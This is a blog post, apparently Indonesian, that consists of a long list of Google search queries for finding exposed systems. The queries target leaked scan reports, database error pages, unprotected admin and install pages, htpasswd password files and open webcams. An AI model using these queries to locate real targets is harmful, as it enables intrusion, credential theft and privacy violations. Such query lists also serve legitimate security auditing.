*" "Version Info" "Boot Version" "Internet Settings" ((inurl:ifgraph "Page generated at") OR ("This page was built using ifgraph")) Analysis Console for Incident Databases ext:cfg radius.cfg ext:cgi intext:"nrg-" " This web page was created on " filetype:pdf "Assessment Report" nessus filetype:php inurl:ipinfo.php "Distributed Intrusion Detection System" filetype:php inurl:nqt intext:"Network Query Tool" filetype:vsd vsd network -samples -examples intext:"Welcome to the Web V.Networks" intitle:"V.Networks [Top]" -filetype:htm intitle:"ADSL Configuration page" intitle:"Azureus : Java BitTorrent Client Tracker" intitle:"Belarc Advisor Current Profile" intext:"Click here for Belarc's PC Management products, for large and small companies." intitle:"BNBT Tracker Info" intitle:"Microsoft Site Server Analysis" intitle:"Nessus Scan Report" "This file was generated by Nessus" intitle:"PHPBTTracker Statistics" | intitle:"PHPBT Tracker Statistics" intitle:"Retina Report" "CONFIDENTIAL INFORMATION" intitle:"start.managing.the.device" remote pbx acc intitle:"sysinfo * " intext:"Generated by Sysinfo * written by The Gamblers." intitle:"twiki" inurl:"TWikiUsers" inurl:"/catalog.nsf" intitle:catalog inurl:"install/install.php" inurl:"map.asp?" intitle:"WhatsUp Gold" inurl:"NmConsole/Login.asp" | intitle:"Login - Ipswitch WhatsUp Professional 2005" | intext:"Ipswitch WhatsUp Professional 2005 (SP1)" "Ipswitch, Inc" inurl:"sitescope.html" intitle:"sitescope" intext:"refresh" -demo inurl:/adm-cfgedit.php inurl:/cgi-bin/finger? "In real life" inurl:/cgi-bin/finger? Enter (account|host|user|username) inurl:/counter/index.php intitle:"+PHPCounter 7.*" inurl:CrazyWWWBoard.cgi intext:"detailed debugging information" inurl:login.jsp.bak inurl:ovcgi/jovw inurl:phpSysInfo/ "created by phpsysinfo" inurl:portscan.php "from Port"|"Port Range" inurl:proxy | inurl:wpad ext:pac | ext:dat findproxyforurl inurl:statrep.nsf -gov inurl:status.cgi?host=all inurl:testcgi xitami inurl:webalizer filetype:png -.gov -.edu -.mil -opendarwin inurl:webutil.pl Looking Glass site:netcraft.com intitle:That.Site.Running Apache "A syntax error has occurred" filetype:ihtml "access denied for user" "using password" "An illegal character has been found in the statement" -"previous message" "ASP.NET_SessionId" "data source=" "Can't connect to local" intitle:warning "Chatologica MetaSearch" "stack tracking" "detected an internal error [IBM][CLI Driver][DB2/6000]" "error found handling the request" cocoon filetype:xml "Fatal error: Call to undefined function" -reply -the -next "Incorrect syntax near" "Incorrect syntax near" "Internal Server Error" "server at" "Invision Power Board Database Error" "ORA-00933: SQL command not properly ended" "ORA-12541: TNS:no listener" intitle:"error occurred" "Parse error: parse error, unexpected T_VARIABLE" "on line" filetype:php "PostgreSQL query failed: ERROR: parser: parse error" "Supplied argument is not a valid MySQL result resource" "Syntax error in query expression " -the "The s?ri?t whose uid is " "is not allowed to access" "There seems to have been a problem with the" " Please try again by clicking the Refresh button in your web browser." "Unable to jump to row" "on MySQL result index" "on line" "Unclosed quotation mark before the character string" "Warning: Bad arguments to (join|implode) () in" "on line" -help -forum "Warning: Cannot modify header information - headers already sent" "Warning: Division by zero in" "on line" -forum
"Warning: mysql_connect(): Access denied for user: '*@*" "on line" -help -forum "Warning: mysql_query()" "invalid query" "Warning: pg_connect(): Unable to connect to PostgreSQL server: FATAL" "Warning: Supplied argument is not a valid File-Handle resource in" "Warning:" "failed to open stream: HTTP request failed" "on line" "Warning:" "SAFE MODE Restriction in effect." "The s?ri?t whose uid is" "is not allowed to access owned by uid 0 in" "on line" "SQL Server Driver][SQL Server]Line 1: Incorrect syntax near" An unexpected token "END-OF-STATEMENT" was found Coldfusion Error Pages filetype:asp + "[ODBC SQL" filetype:asp "Custom Error Message" Category Source filetype:log "PHP Parse error" | "PHP Warning" | "PHP Error" filetype:php inurl:"logging.php" "Discuz" error ht://Dig htsearch error IIS 4.0 error messages IIS web server error messages Internal Server Error intext:"Error Message : Error loading required libraries." intext:"Warning: Failed opening" "on line" "include_path" intitle:"Apache Tomcat" "Error Report" intitle:"Default PLESK Page" intitle:"Error Occurred While Processing Request" +WHERE (SELECT|INSERT) filetype:cfm intitle:"Error Occurred" "The error occurred in" filetype:cfm intitle:"Error using Hypernews" "Server Software" intitle:"Execution of this s?ri?t not permitted" intitle:"Under construction" "does not currently have" intitle:Configuration.File inurl:softcart.exe MYSQL error message: supplied argument.... mysql error with query Netscape Application Server Error page ORA-00921: unexpected end of SQL command ORA-00921: unexpected end of SQL command ORA-00936: missing expression PHP application warnings failing "include_path" sitebuildercontent sitebuilderfiles sitebuilderpictures Snitz! forums db path error SQL syntax error Supplied argument is not a valid PostgreSQL result warning "error on line" php sablotron Windows 2000 web server error messages "ftp://" "www.eastgame.net" "html allowed" guestbook : vBulletin Version 1.1.5" "Select a database to view" intitle:"filemaker pro" "set up the administrator user" inurl:pivot "There are no Administrators Accounts" inurl:admin.php -mysql_fetch_row "Welcome to Administration" "General" "Local Domains" "SMTP Authentication" inurl:admin "Welcome to Intranet" "Welcome to PHP-Nuke" congratulations "Welcome to the Prestige Web-Based Configurator" "YaBB SE Dev Team" "you can now password" | "this is a special page only seen by you. your profile visitors" inurl:imchaos ("Indexed.By"|"Monitored.By") hAcxFtpScan (inurl:/shop.cgi/page=) | (inurl:/shop.pl/page=) allinurl:"index.php" "site=sglinks" allinurl:install/install.php allinurl:intranet admin filetype:cgi inurl:"fileman.cgi" filetype:cgi inurl:"Web_Store.cgi" filetype:php inurl:vAuthenticate filetype:pl intitle:"Ultraboard Setup" Gallery in configuration mode Hassan Consulting's Shopping Cart Version 1.18 intext:"Warning: * am able * write ** configuration file" "includes/configure.php" - intitle:"Gateway Configuration Menu" intitle:"Horde :: My Portal" -"[Tickets" intitle:"Mail Server CMailServer Webmail" "5.2" intitle:"MvBlog powered" intitle:"Remote Desktop Web Connection" intitle:"Samba Web Administration Tool" intext:"Help Workgroup" intitle:"Terminal Services Web Connection" intitle:"Uploader - Uploader v6" -pixloads.com intitle:osCommerce inurl:admin intext:"redistributable under the GNU" intext:"Online Catalog" -demo -site:oscommerce.com intitle:phpMyAdmin "Welcome to phpMyAdmin ***" "running on * as root@*" intitle:phpMyAdmin "Welcome to phpMyAdmin ***" "running on * as root@*" inurl:"/NSearch/AdminServlet" inurl:"index.php? module=ew_filemanager" inurl:aol*/_do/rss_popup?blogID= inurl:footer.inc.php inurl:info.inc.php inurl:ManyServers.htm inurl:newsdesk.cgi? inurl:"t=" inurl:pls/admin_/gateway.htm inurl:rpSys.html inurl:search.php vbulletin inurl:servlet/webacc natterchat inurl:home.asp -site:natterchat.co.uk XOOPS Custom Installation inurl:htpasswd filetype:htpasswd inurl:yapboz_detay.asp + View Webcam User Accessing allinurl:control/multiview inurl:"ViewerFrame?Mode=" intitle:"WJ-NT104 Main Page" inurl:netw_tcp.shtml intitle:"supervisioncam protocol"
Read More..
Diposting oleh
Jericho PS
|
MARVEL and SPIDER-MAN: TM & 2007 Marvel Characters, Inc. Motion Picture © 2007 Columbia Pictures Industries, Inc. All Rights Reserved. 2007 Sony Pictures Digital Inc. All rights reserved. blogger templates
|